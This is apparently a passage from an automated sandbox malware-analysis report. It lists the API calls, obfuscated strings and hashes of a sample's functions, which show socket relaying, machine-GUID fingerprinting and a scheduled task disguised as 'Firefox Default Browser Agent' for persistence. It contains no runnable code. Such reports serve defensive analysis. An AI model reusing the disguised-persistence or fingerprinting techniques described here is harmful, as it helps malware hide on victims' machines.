                              • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 010958F0
                              • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 01095907
                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 01095944
                              • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 0109596F
                              • HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 01095972
                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 0109597D
                              • HeapReAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 01095980
                              • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 010959D7
                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 010959F3
                              • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 010959F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleHeap$PipeProcess$AllocCreateNamedPeek$FileObjectReadSingleWait
                              • String ID: D
                              • API String ID: 2337985897-2746444292
                              • Opcode ID: 7e058b8b4c540d43173d6c011386096069d721f9c42c223a641b07c16a87ac66
                              • Instruction ID: 369a0fdfaaf85e3071ebd5b74806e411aa45879c2756ccfb36394fc7d679ab54
                              • Opcode Fuzzy Hash: 7e058b8b4c540d43173d6c011386096069d721f9c42c223a641b07c16a87ac66
                              • Instruction Fuzzy Hash: E651A171A00219AFEF218BA5EC55FAEBFB8FB44720F144066EA95F7280D77598048B60
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: task
                              • String ID: *$7$D$Q$mvfhugfzhjaxvbknnhrjilxlfyzwtcfeenffipnrifprrliuzcjwulczesnckfzhjp$wcgwprfuhsreihulyoxaptokhjbbumrzzfonukijjmhyytfdjnxxratsclpujhtohnz$wgn$zaiptbmxvlxmaeyxfahlfgzodoaaorzwxdwlcbbswmzrxpgsvwdogtygmxrtlyfffezpl
                              • API String ID: 1384045349-950991828
                              • Opcode ID: 3053f1cef34d9f3cdb2f2a4e6172ad1d3b3356925305e2336dd32a0a48922db1
                              • Instruction ID: dbce17ab19906fe69e73fb5335e66b75bbfc5dd51bf1d238dd08b6c5cdcdebb9
                              • Opcode Fuzzy Hash: 3053f1cef34d9f3cdb2f2a4e6172ad1d3b3356925305e2336dd32a0a48922db1
                              • Instruction Fuzzy Hash: 32613770D04258DFDB15DFA8C8557EDBBB0BB14345F108299E82ABF281DB705A88DF90
                              APIs
                              • inet_pton.WS2_32(00000002,?,?), ref: 01096410
                              • htons.WS2_32(?), ref: 0109642C
                              • inet_pton.WS2_32(00000002,?,?), ref: 0109643E
                              • htons.WS2_32(?), ref: 01096445
                              • socket.WS2_32(00000002,00000001,00000006), ref: 01096458
                              • connect.WS2_32(00000000,?,00000010), ref: 01096473
                              • socket.WS2_32(00000002,00000001,00000006), ref: 01096486
                              • connect.WS2_32(00000000,?,00000010), ref: 0109649B
                              • closesocket.WS2_32(00000000), ref: 010964A3
                              • select.WS2_32(00000000,?), ref: 010964D8
                              • recv.WS2_32(?,?,00000400,00000000), ref: 01096514
                              • send.WS2_32(00000000,?,00000000,00000000), ref: 0109653A
                              • select.WS2_32(00000000,00000002,00000000,00000000,00000000), ref: 0109656C
                              • closesocket.WS2_32(00000000), ref: 01096586
                              • closesocket.WS2_32(00000000), ref: 0109658D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 01096599
                              • HeapFree.KERNEL32(00000000), ref: 010965A0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: closesocket$Heapconnecthtonsinet_ptonselectsocket$FreeProcessrecvsend
                              • String ID:
                              • API String ID: 2202494921-0
                              • Opcode ID: 52f6b9aa7637d2ddf08d789fb91af8220a29baa905c33c94a37493a0facf8783
                              • Instruction ID: 12a3da512e38f270852391e570da06b3d7b6595f5f8059170ef86a5c652b5ee8
                              • Opcode Fuzzy Hash: 52f6b9aa7637d2ddf08d789fb91af8220a29baa905c33c94a37493a0facf8783
                              • Instruction Fuzzy Hash: 3951AFB1104304ABD7209F64DC99F6EB7ECBF88B24F400A19FA95971D1C7B5D9058BA2
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: task
                              • String ID: 6$E$Z$d$dsjeagbelkgqcwpmepfckbptdwhhxxjtlspkxngcfukuyvsbhwvhrzguybcubpflwcttrjukrdntfebinbhhiaqsgnumfjvx$xwsxrlmzs
                              • API String ID: 1384045349-1131196702
                              • Opcode ID: 7c5b3e0ecea4f5311898b973eb9cc39ee11d7d8c40f688d4adeb241590f0b067
                              • Instruction ID: 05333ddef7ade9087382670edc2deba38d4977b54479297a99fb6267df3b1c63
                              • Opcode Fuzzy Hash: 7c5b3e0ecea4f5311898b973eb9cc39ee11d7d8c40f688d4adeb241590f0b067
                              • Instruction Fuzzy Hash: 45517871D04298CECB14CFE8C9407EDBBB0BF16345F10815AD8257F282DBB95A89DB51
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: task
                              • String ID: &$+$6$=J$W
                              • API String ID: 1384045349-2096352046
                              • Opcode ID: e13c7f3bcb2f92791cf94e71d91e99330fb28b7f6862888e8397dbfe8539cfff
                              • Instruction ID: 67e63a657642a89b7d29519d1b45b55dbcfaeb2aa3ecbf456d19010a4d62c368
                              • Opcode Fuzzy Hash: e13c7f3bcb2f92791cf94e71d91e99330fb28b7f6862888e8397dbfe8539cfff
                              • Instruction Fuzzy Hash: 02513870D04268EFCB16DFA4D985BEDBBB0AB1430AF10855AE825BB281DB745A4CDB50
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: task
                              • String ID: $$&$)$csbmzcyumqprcesgqvrbiqvieamoc$wsjzsxnfmygsdnpewkoqbnspsl
                              • API String ID: 1384045349-920653587
                              • Opcode ID: 66ec027f29287c82f7b72fd923056d237a866100c8e58d9cddc31dfbfde0daca
                              • Instruction ID: 0d929c341dd82598c614d8412acab438deb272b4c92dc02f0d36c767554facfc
                              • Opcode Fuzzy Hash: 66ec027f29287c82f7b72fd923056d237a866100c8e58d9cddc31dfbfde0daca
                              • Instruction Fuzzy Hash: C9519930D0429CDEDB16DFE8C9587EEBBB0BF11349F10425AD8266F281DBB54A89DB41
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: task
                              • String ID: 0`$<$=$M$xubyndzhfgkyolyjftysvciojnmqkiuylaiuaozgbzivnsajwdwckwqlrikkokfgwivcmckrldruifkdvqnugkamweifj
                              • API String ID: 1384045349-2568968963
                              • Opcode ID: 7e1b87803a13bd3b4a0d5877e9d6c5d161d7b23027cb34641031f739aa9fb2c2
                              • Instruction ID: 591e4dc8ff01d179bcf5a0b6fbbd58655a84db0a2f1c82b7f9759d99e5d8d1f7
                              • Opcode Fuzzy Hash: 7e1b87803a13bd3b4a0d5877e9d6c5d161d7b23027cb34641031f739aa9fb2c2
                              • Instruction Fuzzy Hash: 5C517770D1125CDECB05CFA8D851BAEBBB0BF15345F10825AE825BB281EB709B48CF61
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: ,$A$\$d$rvqfbzqkzchslsowjgwbgixyqxqahpgvicmrxyzufifpctjqvucgyyeawwbhskxnegbgufnoibeaiqpmwd
                              • API String ID: 0-2569941080
                              • Opcode ID: 2696d7a4ea6815090d872231019fa96fdc9ee925e6a4ca0ea73ecfa79f28ebac
                              • Instruction ID: 404d74543ef392a1690a490d7587b47b94af1e19cb7c6079d24d2db40fec8ad5
                              • Opcode Fuzzy Hash: 2696d7a4ea6815090d872231019fa96fdc9ee925e6a4ca0ea73ecfa79f28ebac
                              • Instruction Fuzzy Hash: E3518970D0425CDFDB14DFA8E941BEEBBB0BF15346F10425AE825BB281DB749A48CB60
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: task
                              • String ID: 8$D$lkyntrsqz
                              • API String ID: 1384045349-148982923
                              • Opcode ID: 74d62a1beb349bdcf0274873373a1b1f0077c31a829d812ac696718d0f5e60e9
                              • Instruction ID: fd031e547e5907a08e19ef11f51a9a1c7cd68c7adb3c497b76e1c5ce6be192fb
                              • Opcode Fuzzy Hash: 74d62a1beb349bdcf0274873373a1b1f0077c31a829d812ac696718d0f5e60e9
                              • Instruction Fuzzy Hash: 94513871D05258EFCB14EBE8CC81BEEBBB0BF15305F1041AAE825BB281DB345A49DB50
                              APIs
                              Strings
                              • ujyqmneftulvwfljvcmwetqvlmaymtityduoubcyyomgaapgyenshgo, xrefs: 001530E3
                              • A, xrefs: 00153137
                              • ocibpbo, xrefs: 001530F4
                              • qpbylxwxflfebdrntvmeuqlydjolllbohiwrnuuzrok, xrefs: 001530D2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: task
                              • String ID: A$ocibpbo$qpbylxwxflfebdrntvmeuqlydjolllbohiwrnuuzrok$ujyqmneftulvwfljvcmwetqvlmaymtityduoubcyyomgaapgyenshgo
                              • API String ID: 1384045349-345111150
                              • Opcode ID: ec8bd9fc0849872e86ff56f46db7aa85ba0b6415417ece5269aeb00618a9ab1a
                              • Instruction ID: 8350ec1d1dd05969ed5f034d23d5993f2d10f8640967eff53345a9cfe9b21370
                              • Opcode Fuzzy Hash: ec8bd9fc0849872e86ff56f46db7aa85ba0b6415417ece5269aeb00618a9ab1a
                              • Instruction Fuzzy Hash: 24314430C04A9CCACB05DFA4C8557ADBBB4FB25745F10825AE8327B281EBB45A88DF40
                              APIs
                              • EnterCriticalSection.KERNEL32(0109A090), ref: 01096B11
                              • StrCmpNIA.SHLWAPI(?,?,00000000), ref: 01096B4A
                              • LeaveCriticalSection.KERNEL32(0109A090,00000000), ref: 01096B66
                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01096BC0
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01096BC7
                              • LeaveCriticalSection.KERNEL32(0109A090,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01096BDD
                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01096BF7
                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01096BFE
                              • LeaveCriticalSection.KERNEL32(0109A090,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01096C0F
                              • GetProcessHeap.KERNEL32(00000008,?,?), ref: 01096C1B
                              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01096C22
                              • LeaveCriticalSection.KERNEL32(0109A090), ref: 01096C33
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$CriticalSection$Leave$Process$Alloc$EnterFree
                              • String ID:
                              • API String ID: 2132424838-0
                              • Opcode ID: 41258747e415305ebf4d7a0dfb4a3be852cbb093c17ce4f9987d50c4a31d62a2
                              • Instruction ID: 16b21cff92a5b4df3ebaccd63b531dfc7c6f42db5bb8175f57b4e23705a3f789
                              • Opcode Fuzzy Hash: 41258747e415305ebf4d7a0dfb4a3be852cbb093c17ce4f9987d50c4a31d62a2
                              • Instruction Fuzzy Hash: 9D31ABB1700210DFEB705BA8A878F6A7BA5FBC4722F084068F6D6C7145EB3B8440D760
                              APIs
                              • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 010971AA
                              • RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 010971C6
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 010971D9
                              • HeapAlloc.KERNEL32(00000000), ref: 010971E0
                              • RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 010971FD
                              • RegCloseKey.ADVAPI32(80000002), ref: 01097209
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapQueryValue$AllocCloseOpenProcess
                              • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                              • API String ID: 2639912721-1211650757
                              • Opcode ID: 344d5f9218939f7cfdc44cb214ca2ce8993ae0714dd05f6572d6b7b1f47673a6
                              • Instruction ID: b49c2b3dc432f6a69b711ff39d0ed55685782093359a2af206a33ddf8afc32eb
                              • Opcode Fuzzy Hash: 344d5f9218939f7cfdc44cb214ca2ce8993ae0714dd05f6572d6b7b1f47673a6
                              • Instruction Fuzzy Hash: 9E31CF32E30215AAEF728A98C864BAABAF9FF44B10F1440D8F9D5D7155E3719540EB90
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 01096C57
                              • CoCreateInstance.OLE32(01091020,00000000,00000001,01091000,?), ref: 01096C74
                              • SysAllocString.OLEAUT32(\Mozilla), ref: 01096CB4
                              • SysFreeString.OLEAUT32(?), ref: 01096CEB
                              • SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 01096CF8
                              • SysFreeString.OLEAUT32(00000000), ref: 01096D0F
                              Strings
                              • Firefox Default Browser Agent 318146B0AF4A39CB, xrefs: 01096CF3
                              • \Mozilla, xrefs: 01096CAF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: String$AllocFree$CreateInitInstanceVariant
                              • String ID: Firefox Default Browser Agent 318146B0AF4A39CB$\Mozilla
                              • API String ID: 478541636-3211539605
                              • Opcode ID: b2fcdaaee5c26ccf9b3799c80057de6a866de9d6d6b52bda5bc67b1b71f7e2ab
                              • Instruction ID: 3864d4deacad71c9bdabbefef9650a8d5c500f52b0d8cae65fe8a02f443a6a17
                              • Opcode Fuzzy Hash: b2fcdaaee5c26ccf9b3799c80057de6a866de9d6d6b52bda5bc67b1b71f7e2ab
                              • Instruction Fuzzy Hash: 6631D770F00248AFDB109F69C898FAEBBB8FF49314F004198F985EB251D6729D84C7A0
                              APIs
                              • type_info::operator==.LIBVCRUNTIME ref: 0015614A
                              • ___TypeMatch.LIBVCRUNTIME ref: 00156258
                              • _UnwindNestedFrames.LIBCMT ref: 001563AA
                              • CallUnexpected.LIBVCRUNTIME ref: 001563C5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                              • String ID: csm$csm$csm
                              • API String ID: 2751267872-393685449
                              • Opcode ID: 804503d9d5a7605fc9167ba405d37da7df3fbcf8567a8a9d18fcc90bd16a855d
                              • Instruction ID: 9d55d93ad887e03eb1136d0cb1376056c84055cf2ee4302a748f12322bf7877e
                              • Opcode Fuzzy Hash: 804503d9d5a7605fc9167ba405d37da7df3fbcf8567a8a9d18fcc90bd16a855d
                              • Instruction Fuzzy Hash: 7AB18A71800609EFCF15DFA4D8819AEBBB5BF24312F94415AEC256F212D730DA69CBD1
                              Strings
                              • G, xrefs: 00152A10
                              • asvicjtdhmzqotxvozjkovueuspcnlsoajeseuzmqsvumshplyhddsgzgnwdujkffassuagpxdjjtqpfeyuvjhzapj, xrefs: 001529B4
                              • beaemujvpajrvbaezouuzkuenvffkjpbnnirudwjvuzqydvezlarzhdsfxwuhzojaavxqsfrojtvvhymywenjfz, xrefs: 001529A3
                              • uddhomtrruwqszocsssabgvinoqawnbjjydctdjlooafgswzslbhgzmrkvbotxaekjvxqqzflyruasphbtqjdnqeddrfqqgnzi, xrefs: 0015297B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: G$asvicjtdhmzqotxvozjkovueuspcnlsoajeseuzmqsvumshplyhddsgzgnwdujkffassuagpxdjjtqpfeyuvjhzapj$beaemujvpajrvbaezouuzkuenvffkjpbnnirudwjvuzqydvezlarzhdsfxwuhzojaavxqsfrojtvvhymywenjfz$uddhomtrruwqszocsssabgvinoqawnbjjydctdjlooafgswzslbhgzmrkvbotxaekjvxqqzflyruasphbtqjdnqeddrfqqgnzi
                              • API String ID: 0-2951736196
                              • Opcode ID: 3fa281e682f16549b839b461f8f24ea8cdf88d41cdde3cb63c1b5eaaeb1b4225
                              • Instruction ID: 81fb2425cbc23bdf23f98f3897179cfae328dc21a879f2b2c395fcdf4373abbf
                              • Opcode Fuzzy Hash: 3fa281e682f16549b839b461f8f24ea8cdf88d41cdde3cb63c1b5eaaeb1b4225
                              • Instruction Fuzzy Hash: 92316971D1435CCBDB15DFA8C849BADBBB0FB16349F20025AD8256F681DBB45A88DB40
                              APIs
                              • InternetCrackUrlW.WININET(0109A114,00000000,00000000,0000003C), ref: 010966B5
                              • GetProcessHeap.KERNEL32(00000008,00000001,0109A114), ref: 010966D7
                              • HeapAlloc.KERNEL32(00000000), ref: 010966DA
                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 01096749
                              • HeapAlloc.KERNEL32(00000000), ref: 0109674C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocProcess$CrackInternet
                              • String ID: <
                              • API String ID: 2637570027-4251816714
                              • Opcode ID: f7bdc0c818998e19179d6bef90bea17b65e52b71f8a4e8117a8c4d64b1e6676c
                              • Instruction ID: b3003288890278937cc51b4daa964e849ceead73ba95488100ca51b32da45f95
                              • Opcode Fuzzy Hash: f7bdc0c818998e19179d6bef90bea17b65e52b71f8a4e8117a8c4d64b1e6676c
                              • Instruction Fuzzy Hash: 4051AC34A002068EEF25CF6CD4A4BAEBBF5BF49314F2840ADD595DB341EA7299029B50
                              APIs
                              • _ValidateLocalCookies.LIBCMT ref: 001559D7
                              • ___except_validate_context_record.LIBVCRUNTIME ref: 001559DF
                              • _ValidateLocalCookies.LIBCMT ref: 00155A68
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00155A93
                              • _ValidateLocalCookies.LIBCMT ref: 00155AE8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                              • String ID: csm
                              • API String ID: 1170836740-1018135373
                              • Opcode ID: 4d6b383edde591740f0e05333e4ad8c062f12b8ba6c7821c6f88b1be2aa0cb65
                              • Instruction ID: 934d24ecc10cd7c1dd4dc588a4285daaece73c1f107282eeb8b431390704973a
                              • Opcode Fuzzy Hash: 4d6b383edde591740f0e05333e4ad8c062f12b8ba6c7821c6f88b1be2aa0cb65
                              • Instruction Fuzzy Hash: F641C034A00608EBCF10DF68C8D0A9EBBB2EF45325F548255EC259F392D775AA59CB90
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: -$E$V$vdxqujrbgdewzmu
                              • API String ID: 0-431869934
